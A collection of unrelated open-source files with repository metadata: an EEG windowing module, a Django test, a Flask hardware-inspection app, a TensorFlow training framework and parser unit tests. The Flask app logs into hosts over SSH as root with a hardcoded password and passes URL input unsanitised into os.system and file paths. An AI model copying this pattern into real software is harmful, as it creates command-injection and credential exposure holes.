str_ = 'ExcludeDef:\n markername: %(name)s\n'\
' preexclude: %(pre)d ms\n'\
' postexclude: %(post)d ms\n' % d
return str_
class IncludeDef(object):
"""Definition of include constraints for window extraction."""
# Same as exclude but with 'in'
def __init__(self, markername, preincludems, postincludems):
super(IncludeDef, self).__init__()
self.markername = markername
self.preincludems = preincludems
self.postincludems = postincludems
def __str__(self):
d = {'name' : self.markername, 'pre' : self.preincludems,
'post' : self.postincludems}
str_ = 'IncludeDef:\n markername: %(name)s\n'\
' preinclude: %(pre)d ms\n'\
' postinclude: %(post)d ms\n' % d
return str_
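# Illustrative sketch (not part of the original module): how a window definition
# with an exclude constraint could be assembled by hand. The marker names and
# millisecond offsets below are made-up values.
def _example_window_definition():
    artifact_exclude = ExcludeDef(markername='S 99',
                                  preexcludems=200,
                                  postexcludems=200)
    return LabeledWindowDef(windef_name='target_window',
                            classname='Target',
                            markername='S 1',
                            startoffsetms=-200,
                            endoffsetms=800,
                            excludedefs=[artifact_exclude])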
# ===============================
# = Ring buffer support classes =
# ===============================
class RingBuffer:
"""Generic ring buffer class"""
# Nice approach that makes use of dynamic classes
# http://code.activestate.com/recipes/68429/
def __init__(self,size_max):
self.max = size_max
self.data = []
def append(self,x):
"""append an element at the end of the buffer"""
self.data.append(x)
if len(self.data) == self.max:
self.cur=0
self.__class__ = RingBufferFull
def get(self):
""" return a list of elements from the oldest to the newest"""
return self.data
def __str__(self):
str_ = "RingBuffer with %d elements:" % len(self.data)
for d in self.data:
str_ += "\n%s" % d.__str__()
return str_
def __len__(self):
return len(self.data)
class RingBufferFull(RingBuffer):
"""Generic ring buffer when full"""
def __init__(self,n):
raise "RingBufferFull can't be directly instantiated"
def append(self,x):
self.data[self.cur]=x
self.cur=int((self.cur+1) % self.max)
def get(self):
return self.data[self.cur:]+self.data[:self.cur]
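# Illustrative sketch (not part of the original module): once `size_max` elements
# have been appended the instance silently becomes a RingBufferFull, get() keeps
# returning the elements oldest-first, and new appends overwrite the oldest slot.
def _example_ring_buffer():
    buf = RingBuffer(size_max=3)
    for block in (1, 2, 3, 4):
        buf.append(block)
    return buf.get()   # -> [2, 3, 4]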
class WindowFactory(object):
""" Factory class to create window definition objects with static methods
This WindowFactory provides static methods in order to read a given
Windower specification file, which should be a valid YAML specification
of a window defs, and returns a list of the containing window definitions.
:Author: Jan Hendrik Metzen (jhm@informatik.uni-bremen.de)
:Created: 2008/11/25
"""
@staticmethod
def default_windower_spec():
window_specs = {'skip_ranges': [{'start': 0, 'end': 0}],
'window_defs':
{'window':
{'classname': 'Window',
'markername': 'null',
'jitter': 0,
'endoffsetms': 1000,
'startoffsetms': 0}}}
return WindowFactory.create_window_defs(window_specs)
@staticmethod
def window_definitions_from_yaml(yaml_file):
        # Read and parse the given YAML specification file;
        # default_windower_spec() provides a fallback when no windower file is given
window_specs = yaml.load(yaml_file)
return WindowFactory.create_window_defs(window_specs)
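    # Illustrative YAML input (not shipped with the code): a minimal specification
    # that window_definitions_from_yaml() would accept. The marker name and the
    # offsets are made-up values; 'exclude_defs', 'include_defs', 'startmarker'
    # and 'endmarker' are optional.
    #
    #     skip_ranges:
    #       - {start: 0, end: 1000}
    #     window_defs:
    #       standard:
    #         classname: Standard
    #         markername: "S 1"
    #         startoffsetms: 0
    #         endoffsetms: 1000
    #         jitter: 0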
@staticmethod
def create_window_defs(window_specs):
"""
        Build LabeledWindowDef objects from an already parsed window
        specification (e.g. the result of yaml.load) and
        return them as a list
"""
# The skip ranges are currently not supported correctly by the
        # EEG server. Because of that, we use only the end of the first range
# for specifying skipfirstms
try:
skipfirstms = window_specs['skip_ranges'][0]['end']
except KeyError:
skipfirstms = 0
        # An alternative to skipping milliseconds is to define a marker that
        # labels the ranges to be skipped
if window_specs.has_key('startmarker'):
startmarker = window_specs['startmarker']
else:
startmarker = None
if window_specs.has_key('endmarker'):
endmarker = window_specs['endmarker']
else:
endmarker = None
# Create all ExcludeDef objects which are specified in the YAML file
excludes = {}
excludes_specs = window_specs.get('exclude_defs', {})
for exclude_name, exclude_spec in excludes_specs.iteritems():
marker_names = exclude_spec.pop("markernames")
exclude_defs = []
# For every marker:
for marker_name in marker_names:
# Create a separate ExcludeDef
exclude_defs.append(ExcludeDef(markername = marker_name,
**exclude_spec))
excludes[exclude_name] = exclude_defs
# Create all IncludeDef objects which are specified in the YAML file (copy of exclude with 'ex'-->'in')
includes = {}
includes_specs = window_specs.get('include_defs', {})
for include_name, include_spec in includes_specs.iteritems():
marker_names = include_spec.pop("markernames")
include_defs = []
# For every marker:
for marker_name in marker_names:
# Create a separate IncludeDef
include_defs.append(IncludeDef(markername = marker_name,
**include_spec))
includes[include_name] = include_defs
        # Create all window defs for the windower (parts with 'ex' copied and replaced by 'in')
# If no defs are set, an empty dict of defs is created
if window_specs.has_key('window_def_specs'):
window_defs = {}
for spec_name, spec in window_specs['window_def_specs'].iteritems():
if spec['markername'] == 'null':
win_def = {}
win_def.update({'classname':spec['classname']})
win_def.update({'markername':spec['markername']})
win_def.update({'startoffsetms':spec['startoffsetms']})
win_def.update({'endoffsetms':spec['endoffsetms']})
win_def.update({'jitter': spec['jitter']})
win_def.update({'excludedefs' : spec['excludedefs']})
window_name = spec['windownameprefix']
window_defs.update({window_name:win_def})
else:
for i in range(int(spec['startblockms']), int(spec['endblockms'])+int(spec['stepms']), int(spec['stepms'])):
win_def = {}
win_def.update({'classname':spec['classname']})
win_def.update({'markername':spec['markername']})
win_def.update({'startoffsetms':i})
win_def.update({'endoffsetms':i + int(spec['windowlengthms'])})
win_def.update({'jitter': spec['jitter']})
win_def.update({'excludedefs' : spec['excludedefs']})
window_name = '%s%s' % (spec['windownameprefix'], str(win_def['endoffsetms']).zfill(3))
window_defs.update({window_name:win_def})
window_specs['window_defs'] = window_defs
windows = []
for window_name, window_spec in window_specs['window_defs'].iteritems():
exclude_defs = []
include_defs = []
if window_spec.has_key('excludedefs'):
for exclude_name in window_spec['excludedefs']:
exclude_defs.extend(excludes[exclude_name])
if window_spec.has_key('includedefs'):
for include_name in window_spec['includedefs']:
include_defs.extend(includes[include_name])
window_spec['excludedefs'] = exclude_defs
window_spec['includedefs'] = include_defs
windows.append(
LabeledWindowDef(windef_name = window_name,
skipfirstms = skipfirstms,
startmarker = startmarker,
endmarker = endmarker,
**window_spec))
        return windows
| {
"content_hash": "6b5f88c7efd0a8c5ac67a81814d3f73d",
"timestamp": "",
"source": "github",
"line_count": 1167,
"max_line_length": 128,
"avg_line_length": 43.36846615252785,
"alnum_prop": 0.5582383276362846,
"repo_name": "pyspace/pyspace",
"id": "e3f394815a705d02b75e6d21275f90ae06ab1a1d",
"size": "50635",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pySPACE/missions/support/windower.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11128"
},
{
"name": "C++",
"bytes": "309606"
},
{
"name": "Matlab",
"bytes": "3768"
},
{
"name": "Python",
"bytes": "3160853"
},
{
"name": "QMake",
"bytes": "3217"
},
{
"name": "Shell",
"bytes": "253"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from yacon.models.site import Site
from yacon.tests.utils import create_test_site
# ============================================================================
class ManagementCommandTests(TestCase):
def setUp(self):
create_test_site()
def test_check_commands(self):
        # check that the 'my_name' site was created
site = Site.objects.get(name='my_name')
self.assertTrue(site)
# check that the default site was created
site = Site.objects.get(name='Localhost Site')
self.assertTrue(site)
# check that test data was created
pp = site.parse_path('/articles/health/')
self.assertTrue(pp.node)
| {
"content_hash": "da203732dab5512882ad10988991af4f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 78,
"avg_line_length": 30.91304347826087,
"alnum_prop": 0.5893108298171589,
"repo_name": "cltrudeau/django-yacon",
"id": "751f9e17ad4035a5eb2f2b3e2be44125575b21fa",
"size": "711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yacon/tests/test_commands.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "39473"
},
{
"name": "HTML",
"bytes": "102299"
},
{
"name": "JavaScript",
"bytes": "121614"
},
{
"name": "Python",
"bytes": "303378"
},
{
"name": "Shell",
"bytes": "1134"
}
],
"symlink_target": ""
} |
from flask import Flask,send_file
from flask.ext.cors import CORS
from qrcode import *
import pexpect
import json
import re
import os
from StringIO import StringIO
import sys
import reachable_ips
import is_ssh
app = Flask(__name__)
cors = CORS(app)
@app.route("/<info>/<ip>")
@app.route("/<info>/<ip>/<eth>")
@app.route("/<info>/<ip>/<username>/<password>")
@app.route("/<info>/<ip>/<eth>/<username>/<password>")
def hello(info,ip,eth='eth0',username="root",password="rootroot"):
if info != "ssh":
child = pexpect.spawn ('ssh '+username+'@'+ip)
i = child.expect([pexpect.TIMEOUT,'.*password: ','.*(yes/no)? ', pexpect.EOF])
if i == 2: # In this case SSH does not have the public key cached.
child.sendline ('yes')
child.expect ('.*password: ')
child.sendline (password)
#child.expect ('.*#')
j = child.expect (['.*#','.*password:'])
if j == 1:
return "ACCESS DENIED ! ENTER CORRECT USERNAME or PASSWORD !"
elif i == 1:
child.sendline (password)
j = child.expect (['.*#','.*password:'])
if j == 1:
return "ACCESS DENIED ! ENTER CORRECT USERNAME or PASSWORD !"
else:
return "ERROR! could not login with SSH.:"
#print ip
if info == "os":
child.sendline ('uname -n')
child.expect ('.*#')
hostname = str(child.after).split("\n")[1]
child.sendline ('uname -m')
child.expect ('.*#')
bit = str(child.after).split("\n")[1]
child.sendline ('lsb_release -d')
child.expect ('.*#')
os = str(child.after).split("\n")[1].split(":")[1].strip()
if re.search('Desc',(child.after)):
pass
else:
child.sendline ('cat /etc/*redhat*')
child.expect ('.*#')
os = str((child.after).split("\n")[1])
return "HOSTNAME : "+hostname+"\n"+ \
"OS : "+os+"\n"+ \
"ARCHITECURE : "+bit
elif info == "ram":
# RAM DETAILS
child.sendline ('free -m')
child.expect ('.*#')
ram_details = str(child.after).split("\n")[2].split(":")[1]
ram_details = re.sub("[ ]{1,}"," ",ram_details).split(" ")
ram_total = str(ram_details[1]) + " MB"
ram_used = str(ram_details[2]) + " MB"
ram_free = str(ram_details[3]) + " MB"
return "RAM TOTAL : "+ram_total+"\n"+ \
"RAM USED : "+ram_used+"\n"+ \
"RAM FREE : "+ram_free
elif info == "code":
qr = QRCode(version=20, error_correction=ERROR_CORRECT_L)
qr.add_data("pell-checker was created and developed by Reverso-Softissimo in addition to the online ...")
qr.make() # Generate the QRCode itself
# im contains a PIL.Image.Image object
im = qr.make_image()
# To save it
#im.save("filename.png")
img_io = StringIO()
        im.save(img_io, 'JPEG', quality=70)
img_io.seek(0)
return send_file(img_io, mimetype='image/jpeg')
#return send_file(filename, mimetype='image/png')
elif info == "processor":
#NO. OF PROCESSING UNITS
child.sendline ('cat /proc/cpuinfo | grep processor | wc -l')
child.expect ('.*#')
No_of_processor = str(child.after).split("\n")[1].strip()
#PROCESSOR MODEL
child.sendline ('cat /proc/cpuinfo | grep name')
child.expect ('.*#')
processor_model = str(child.after).split("\n")[1].split(":")[1].strip()
#NO. OF CPU CORES
child.sendline ('cat /proc/cpuinfo | grep cores')
child.expect ('.*#')
cpu_core = str(child.after).split("\n")[1].split(":")[1].strip()
return "NO. OF PROCESSOR : "+No_of_processor+"\n" \
"PROCESSOR MODEL : "+processor_model+"\n" \
"NO. OF CPU CORE : "+cpu_core
elif info == "interfaces":
child.sendline ('ifconfig')
child.expect ('.*#')
ifconfig_lines = (child.after)
#data = ""
#for lines in ifconfig_lines:
# data = data+"\n"+lines
return ifconfig_lines
elif info == "storage":
child.sendline ('df -H')
child.expect ('.*#')
ifconfig_lines = (child.after)
#return str(ifconfig_lines)
#data = ""
#for lines in ifconfig_lines:
# data = data+"\n"+lines
return ifconfig_lines
elif info == "select_eth":
child.sendline ('ifconfig')
child.expect ('.*#')
ifconfig_lines = str(child.after).split("\n")
eths = ""
for lines in ifconfig_lines:
if re.search(r'eth',lines):
if re.search(r'ether',lines):
pass
else:
interface_name = lines.split('Link')[0].strip()
eths = eths+','+interface_name
if re.search(r'flags',lines):
interface_name = lines.split('flags')[0].strip()
eths = eths+','+interface_name
eth_names = re.sub(r':',"",eths)[1:].strip()
return eth_names
elif info == "ethernet":
child.sendline ('ifconfig '+eth)
child.expect ('.*#')
ifconfig_lines = str(child.after).split("\n")
#TO GET MAC
if re.search(r'HWaddr',ifconfig_lines[1]):
#interface_name = lines.split('Link')[0].strip()
interface_mac = ifconfig_lines[1].split('HWaddr')[1].strip()
elif re.search(r'ether',ifconfig_lines[4]):
interface_mac = ifconfig_lines[4].split('txqueuelen')[0].split('ether')[1].strip()
else:
interface_mac = "UNABLE TO GET MAC"
# TO GET IP
if re.search(r'Bcast',ifconfig_lines[2]):
if re.search(r'inet addr',ifconfig_lines[2]):
interface_ip = ifconfig_lines[2].split('Bcast')[0].split(':')[1].strip()
elif re.search(r'broadcast',ifconfig_lines[2]):
interface_ip = ifconfig_lines[2].split('netmask')[0].split('inet')[1].strip()
else:
interface_ip = 'No Ip'
child.sendline ('ethtool '+eth)
child.expect ('.*#')
ethtool_details1 = (child.after)
ethtool_details = list((child.after).split("\n"))
#print ethtool_details.strip()
for ethtool_detail in ethtool_details:
#print ethtool_detail
if re.search(r'[s|S]peed',ethtool_detail):
interface_speed = ethtool_detail.split(":")[1].strip()
elif re.search(r'Link detected',ethtool_detail):
interface_link_status = ethtool_detail.split(":")[1].strip()
# INTERFACE DRIVER
try:
child.sendline ('lshw -short | grep '+eth)
child.expect ('.*#')
interface_driver = str(child.after).split("\n")[1]
interface_driver = re.sub("[ ]{1,}"," ",interface_driver).split("network")[1].strip()
except:
interface_driver = "UNABLE TO GET DRIVER INFO"
return "IP : "+interface_ip+"\n" \
"MAC : "+interface_mac+"\n" \
"SPEED : "+interface_speed+"\n" \
"DRIVER : "+interface_driver+"\n" \
"LINK STATUS : "+interface_link_status
elif info == "ssh":
ip = "192.168."+ip+".*"
#network = [ip]
#ip_list = is_ssh.ssh_ips(network)
f = open("ips_"+ip+".txt","r")
data = f.read()
f.close()
return data
#return "sssh"
else:
child.sendline ('logout')
os.system("python difos.py "+ip+" > result_"+ip+".txt")
f = open("result_"+ip+".txt","r")
data = ""
for line in f.readlines():
            data = data + line
#print data
return data
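# Illustrative requests (not part of the original script): host and port are
# assumptions based on app.run() below, which uses Flask's default port 5000.
#
#   http://<server>:5000/os/192.168.1.10               -> hostname, OS, architecture
#   http://<server>:5000/ram/192.168.1.10              -> RAM totals via `free -m`
#   http://<server>:5000/ethernet/192.168.1.10/eth0    -> IP/MAC/speed/driver of eth0
#   http://<server>:5000/os/192.168.1.10/admin/secret  -> same as above with explicit credentials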
if __name__ == "__main__":
app.run(host= '0.0.0.0')
#is_ssh.ssh_ips()
| {
"content_hash": "a54e93e13fcf5ed96568b09d0d4755cb",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 107,
"avg_line_length": 30.929515418502202,
"alnum_prop": 0.584247258225324,
"repo_name": "MuthuramanG/SpotLight",
"id": "fc83d66421c5c49acca132cdcab9f32756531238",
"size": "7021",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SpotLight.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8965"
}
],
"symlink_target": ""
} |
import tqdm
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import utils.filesys as fs
import utils.utils as ut
import utils.tfw as tfw
import utils.printer as pr
import utils.datasets as ds
""" A combination of modules that interacts with environment """
class Model:
def __init__(self, name, **kwargs):
self.name = name
self._make_model(**kwargs)
self._set_description()
self._make_var_dict()
self._make_session()
def __del__(self):
self.sess.close()
def _set_description(self, **kwargs):
desc = 'name: {0}'.format(self.name)
for module in self.modules:
desc += '\n/{0}: {1}'.format(module.name, module.get_description())
self._make_description(desc)
def _make_description(self, desc):
self.description = desc
self.desc = tf.summary.text(
'description', tf.convert_to_tensor(desc))
def _make_model(self, **kwargs):
self.modules = []
def _make_var_dict(self):
self.var_dict = {}
for module in self.modules:
self.var_dict.update(module.var_dict)
def _make_session(self):
self.model_saver = tf.train.Saver(self.var_dict)
self.initializer = tf.global_variables_initializer()
self.sess = tf.Session()
self.reset()
self.print_num_params()
def print_num_params(self):
for module in self.modules:
pr.log('# of params in {0}: {1}'.format(
module.name, module.get_num_params()))
def reset(self):
self.sess.run(self.initializer)
def save(self, path):
fs.check_dir(path, make=True)
self.model_saver.save(self.sess, path)
def load(self, path):
fs.check_dir(path, fatal=True)
self.model_saver.restore(self.sess, path)
#---------------------------------------------------------------------------#
#--------------------------------- System ----------------------------------#
#---------------------------------------------------------------------------#
class System:
def __init__(self, dataset):
self.dataset = dataset
def train_x(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch['x'], **kwargs)
for proc in procs:
proc.process(batch, result)
def train_xy(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch['x'], batch['y'], **kwargs)
for proc in procs:
proc.process(batch, result)
def train_batch(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch, batch_count, **kwargs)
for proc in procs:
proc.process(batch, result)
def test_x(self, test_func, batch_size=100):
gen = ds.epoch_generator(self.dataset['test'], batch_size)
results = []
for batch in gen:
results.append(test_func(batch['x']))
return np.mean(results)
def test_xy(self, test_func, batch_size=100):
gen = ds.epoch_generator(self.dataset['test'], batch_size)
results = []
for batch in gen:
results.append(test_func(batch['x'], batch['y']))
return np.mean(results)
#---------------------------------------------------------------------------#
#------------------------------- Processors --------------------------------#
#---------------------------------------------------------------------------#
class ResultProcessor:
def process(self, batch, result):
pass
class Logger(ResultProcessor):
def __init__(self, model, log_dir='./log/', scalar_step=1, image_step=1000):
self.log_dir = log_dir + str(ut.generate_id()) + '/'
fs.check_dir(self.log_dir, make=True)
self.summary_saver = tf.summary.FileWriter(self.log_dir, model.sess.graph)
self.log(model.sess.run(model.desc))
self.scalar_step = scalar_step
self.image_step = image_step
def process(self, batch, result):
gs = result['global_step']
s = result.get('summary', None)
si = result.get('summary-image', None)
if gs % self.scalar_step == 0:
self.log(s, gs)
if gs % self.image_step == 0:
self.log(si, gs)
def log(self, summary=None, global_step=0):
if summary is not None:
self.summary_saver.add_summary(summary, global_step)
class Reporter(ResultProcessor):
def __init__(self, steps=100, kwords=[], log_dir=None):
self.steps = steps
self.kwords = kwords
self.log_dir = log_dir
def process(self, batch, result):
step = batch['step']
if step % self.steps == 0:
report = '[step {0}]'.format(step)
if 'global_step' in result:
report += '[gstep {0}]'.format(result['global_step'])
for word in self.kwords:
report += '[{0} {1:.4f}]'.format(word, result[word])
tqdm.tqdm.write(report)
self.log2file(report)
def log2file(self, msg):
if self.log_dir is not None:
with open(self.log_dir + "report.txt", "a") as file:
file.write(msg + "\n")
file.close()
class Presenter(ResultProcessor):
def __init__(self, name, sess, func, fig_num=1, steps=100, logger=None):
self.name = name
self.sess = sess
self.func = func
self.fig_num = fig_num
self.steps = steps
self.logger = logger
plt.ion()
if logger is not None:
image = func()
self.image_ph = tf.placeholder(shape=image.shape, dtype=tf.float32)
self.image_r = tfw.compact(self.image_ph)
self.summary = tf.summary.image(name, self.image_r)
def __del__(self):
plt.ioff()
plt.show()
def process(self, batch, result):
gstep = result['global_step']
if gstep % self.steps == 0:
images = self.func()
# Summarizing the image
if self.logger is not None:
self.logger.log(
self.sess.run(self.summary, {self.image_ph: images}), gstep)
# Displaying the image
plt.figure(self.fig_num)
ut.show2(images)
plt.pause(1e-5)
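# Hypothetical wiring sketch (not part of the original module): assumes a concrete
# Model subclass whose `train` callable accepts (x, y) batches and returns a dict
# containing at least 'global_step', 'summary' and 'loss' -- the keys consumed by
# Logger and Reporter above -- and whose `test` callable returns a scalar metric.
# The names `model.train` and `model.test` are assumptions, not part of Model.
def _example_training_loop(model, dataset):
    system = System(dataset)
    logger = Logger(model, log_dir='./log/', scalar_step=10)
    reporter = Reporter(steps=50, kwords=['loss'], log_dir=logger.log_dir)
    system.train_xy(model.train, batch_count=200, batch_size=32,
                    procs=[logger, reporter])
    return system.test_xy(model.test)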
| {
"content_hash": "19f1fa7e4395cf7e505d6b01f1f2cb54",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 87,
"avg_line_length": 28.0625,
"alnum_prop": 0.6176117868768203,
"repo_name": "MehranMirkhan/ai_system",
"id": "a58168979af6c28358f98a6a699ff08e6b815433",
"size": "5838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "60608"
}
],
"symlink_target": ""
} |
"""Test the runtime.parser module."""
import unittest
import runtime.lexer
import runtime.env
import runtime.flags
from runtime.parser import *
def token(value, kind):
return lexer.TokenTuple(value=value, kind=kind)
asgn_token = token("=", lexer.OPERATOR)
asgnadd_token = token("+=", lexer.OPERATOR)
asgnsub_token = token("-=", lexer.OPERATOR)
asgnmul_token = token("*=", lexer.OPERATOR)
asgndiv_token = token("/=", lexer.OPERATOR)
asgnpow_token = token("^=", lexer.OPERATOR)
asgnmod_token = token("%=", lexer.OPERATOR)
plus_token = token("+", lexer.OPERATOR)
minus_token = token("-", lexer.OPERATOR)
neg_token = token("!", lexer.OPERATOR)
and_token = token("&&", lexer.OPERATOR)
or_token = token("||", lexer.OPERATOR)
xor_token = token("^|", lexer.OPERATOR)
equal_token = token("==", lexer.OPERATOR)
unequal_token = token("!=", lexer.OPERATOR)
smaller_token = token("<", lexer.OPERATOR)
larger_token = token(">", lexer.OPERATOR)
smequ_token = token("<=", lexer.OPERATOR)
lgequ_token = token(">=", lexer.OPERATOR)
mod_token = token("%", lexer.OPERATOR)
type_token = token(":", lexer.OPERATOR)
multiply_token = token("*", lexer.OPERATOR)
divide_token = token("/", lexer.OPERATOR)
power_token = token("^", lexer.OPERATOR)
lprt_token = token(")", lexer.LPRT)
sep_token = token(",", lexer.SEPARATOR)
identifier_token = token("abc", lexer.IDENTIFIER)
string_token = token("\"abc\"", lexer.STRING)
rprt_token = token("(", lexer.RPRT)
number_token = token("1", lexer.NUMBER)
operation_tokens = [plus_token, minus_token, sep_token, lprt_token, None]
value_tokens = [identifier_token, string_token, rprt_token, number_token]
all_tokens = operation_tokens + value_tokens
def clean_lex(expr):
clean = lexer.run(expr)
output = []
for e in clean:
if e.kind is not lexer.WHITESPACE:
output.append(e)
return output
class TestParser(unittest.TestCase):
"""Test the parser."""
def test_is_assignment(self):
cases = [
(asgn_token, True),
(asgnadd_token, True),
(asgnsub_token, True),
(asgnmul_token, True),
(asgndiv_token, True),
(asgnmod_token, True),
(asgnpow_token, True),
(None, False),
(number_token, False),
]
for tc in cases:
self.assertEqual(is_assignment(tc[0]), tc[1],
"%s mistakingly reported as assignment" % str(tc[0]))
def test_matching_block(self):
cases = [
(clean_lex("{}"), 1),
(clean_lex("{"), -1),
(clean_lex("}"), -1),
(clean_lex("{{}"), -1),
(clean_lex("{{}}"), 3),
(clean_lex("{ 123; }"), 3),
]
for tc in cases:
self.assertEqual(find_matching_block(tc[0], 1), tc[1])
def test_matching_prt(self):
cases = [
(clean_lex("()"), 1),
(clean_lex("("), -1),
(clean_lex(")"), -1),
(clean_lex("(()"), -1),
(clean_lex("(123)"), 2),
(clean_lex("(12 12)"), 3),
]
for tc in cases:
self.assertEqual(find_matching_prt(tc[0], 1), tc[1])
def test_arg_count(self):
cases = [
(plus_token, value_tokens, 2),
(plus_token, operation_tokens, 1),
(minus_token, value_tokens, 2),
(minus_token, operation_tokens, 1),
(neg_token, value_tokens, 1),
(neg_token, operation_tokens, 1),
(and_token, all_tokens, 2),
(or_token, all_tokens, 2),
(xor_token, all_tokens, 2),
(equal_token, all_tokens, 2),
(unequal_token, all_tokens, 2),
(smaller_token, all_tokens, 2),
(larger_token, all_tokens, 2),
(smequ_token, all_tokens, 2),
(lgequ_token, all_tokens, 2),
(mod_token, all_tokens, 2),
(type_token, all_tokens, 2),
(multiply_token, all_tokens, 2),
(divide_token, all_tokens, 2),
(power_token, all_tokens, 2),
(asgn_token, all_tokens, 2),
(asgnadd_token, all_tokens, 2),
(asgnsub_token, all_tokens, 2),
(asgnmul_token, all_tokens, 2),
(asgndiv_token, all_tokens, 2),
(asgnpow_token, all_tokens, 2),
(asgnmod_token, all_tokens, 2),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(get_arg_count(tc[0].value, e), tc[2],
"bad operator arg count for %s when tested against %s" % (tc[0].value, e))
def test_precedence(self):
cases = [
(neg_token, all_tokens, 7),
(plus_token, operation_tokens, 7),
(minus_token, operation_tokens, 7),
(power_token, all_tokens, 6),
(divide_token, all_tokens, 5),
(multiply_token, all_tokens, 5),
(plus_token, value_tokens, 4),
(minus_token, value_tokens, 4),
(type_token, all_tokens, 4),
(mod_token, all_tokens, 3),
(smaller_token, all_tokens, 2),
(larger_token, all_tokens, 2),
(smequ_token, all_tokens, 2),
(lgequ_token, all_tokens, 2),
(equal_token, all_tokens, 2),
(unequal_token, all_tokens, 2),
(and_token, all_tokens, 1),
(or_token, all_tokens, 1),
(xor_token, all_tokens, 1),
(asgn_token, all_tokens, 0),
(asgnadd_token, all_tokens, 0),
(asgnsub_token, all_tokens, 0),
(asgnmul_token, all_tokens, 0),
(asgndiv_token, all_tokens, 0),
(asgnpow_token, all_tokens, 0),
(asgnmod_token, all_tokens, 0),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(get_precedence(tc[0].value, e), tc[2],
"bad operator precedence for %s when tested against %s" % (tc[0].value, e))
def test_associativity(self):
cases = [
(neg_token, all_tokens, False),
(plus_token, operation_tokens, False),
(minus_token, operation_tokens, False),
(power_token, all_tokens, False),
(divide_token, all_tokens, True),
(multiply_token, all_tokens, True),
(plus_token, value_tokens, True),
(minus_token, value_tokens, True),
(type_token, all_tokens, True),
(mod_token, all_tokens, True),
(smaller_token, all_tokens, True),
(larger_token, all_tokens, True),
(smequ_token, all_tokens, True),
(lgequ_token, all_tokens, True),
(equal_token, all_tokens, True),
(unequal_token, all_tokens, True),
(and_token, all_tokens, True),
(or_token, all_tokens, True),
(xor_token, all_tokens, True),
(asgn_token, all_tokens, True),
(asgnadd_token, all_tokens, True),
(asgnsub_token, all_tokens, True),
(asgnmul_token, all_tokens, True),
(asgndiv_token, all_tokens, True),
(asgnpow_token, all_tokens, True),
(asgnmod_token, all_tokens, True),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(is_left_associative(tc[0].value, e), tc[2],
"bad operator associativity for %s when tested against %s" % (tc[0].value, e))
def test_expression(self):
pass
def test_declaration(self):
# case 1: var a: int, length 4
case1 = ast.Sequence()
case1.add(ast.Declaration("a", "int"))
# case 2: var a = null, length 4
case2 = ast.Sequence()
case2.add(ast.Declaration("a", "null"))
case2_assgn = ast.Assignment("a", True)
case2_assgn.add(ast.Literal(env.Value(env.NULL)))
case2.add(case2_assgn)
# case 3: var a: int = null, length 6
case3 = ast.Sequence()
case3.add(ast.Declaration("a", "int"))
case3_assgn = ast.Assignment("a", False)
case3_assgn.add(ast.Literal(env.Value(env.NULL)))
case3.add(case3_assgn)
# case 4: var a, b = null, length 6
case4 = ast.Sequence()
case4.add(ast.Declaration("a", "null"))
case4.add(ast.Declaration("b", "null"))
case4_assgn_a = ast.Assignment("a", True)
case4_assgn_a.add(ast.Literal(env.Value(env.NULL)))
case4_assgn_b = ast.Assignment("b", True)
case4_assgn_b.add(case4_assgn_a)
case4.add(case4_assgn_b)
# case 5: var a, b, c: int = null, length 10
case5 = ast.Sequence()
case5.add(ast.Declaration("a", "int"))
case5.add(ast.Declaration("b", "int"))
case5.add(ast.Declaration("c", "int"))
case5_assgn_a = ast.Assignment("a", False)
case5_assgn_a.add(ast.Literal(env.Value(env.NULL)))
case5_assgn_b = ast.Assignment("b", False)
case5_assgn_b.add(case5_assgn_a)
case5_assgn_c = ast.Assignment("c", False)
case5_assgn_c.add(case5_assgn_b)
case5.add(case5_assgn_c)
cases = [
("var a: int", case1, 3),
("var a = null", case2, 3),
("var a: int = null", case3, 5),
("var a, b = null", case4, 5),
("var a, b, c: int = null", case5, 9)
]
for tc in cases:
output, offset = generate_declaration(clean_lex(tc[0]))
self.assertEqual(output, tc[1],
"%s is not equal to %s" % (str(output), str(tc[1])))
self.assertEqual(offset, tc[2],
"%s offset %d is not equal to %d" % (str(output), offset, tc[2]))
# error-case 6: var a
# error-case 7: var a: null, b: null
# error-case 8: var a: null, b
error_cases = [
("var a", ParseException),
("var a: null, b: null", ParseException),
("var a: null, b", ParseException),
]
for tc in error_cases:
tokens = clean_lex(tc[0])
self.assertRaises(tc[1], generate_declaration, tokens)
def test_assignment(self):
case1_assgn = ast.Assignment("a")
case1_assgn.add(ast.Identifier("a"))
case1 = case1_assgn
case2_assgn = ast.Assignment("a")
case2_assgnadd = ast.Operation("+")
case2_assgnadd.add(ast.Identifier("a"))
case2_assgnadd.add(ast.Literal(env.Value(env.NULL)))
case2_assgn.add(case2_assgnadd)
case2 = case2_assgn
case3_assgn = ast.Assignment("a")
case3_assgnsub = ast.Operation("-")
case3_assgnsub.add(ast.Identifier("a"))
case3_assgnsub.add(ast.Literal(env.Value(env.NULL)))
case3_assgn.add(case3_assgnsub)
case3 = case3_assgn
case4_assgn = ast.Assignment("a")
case4_assgnmul = ast.Operation("*")
case4_assgnmul.add(ast.Identifier("a"))
case4_assgnmul.add(ast.Literal(env.Value(env.NULL)))
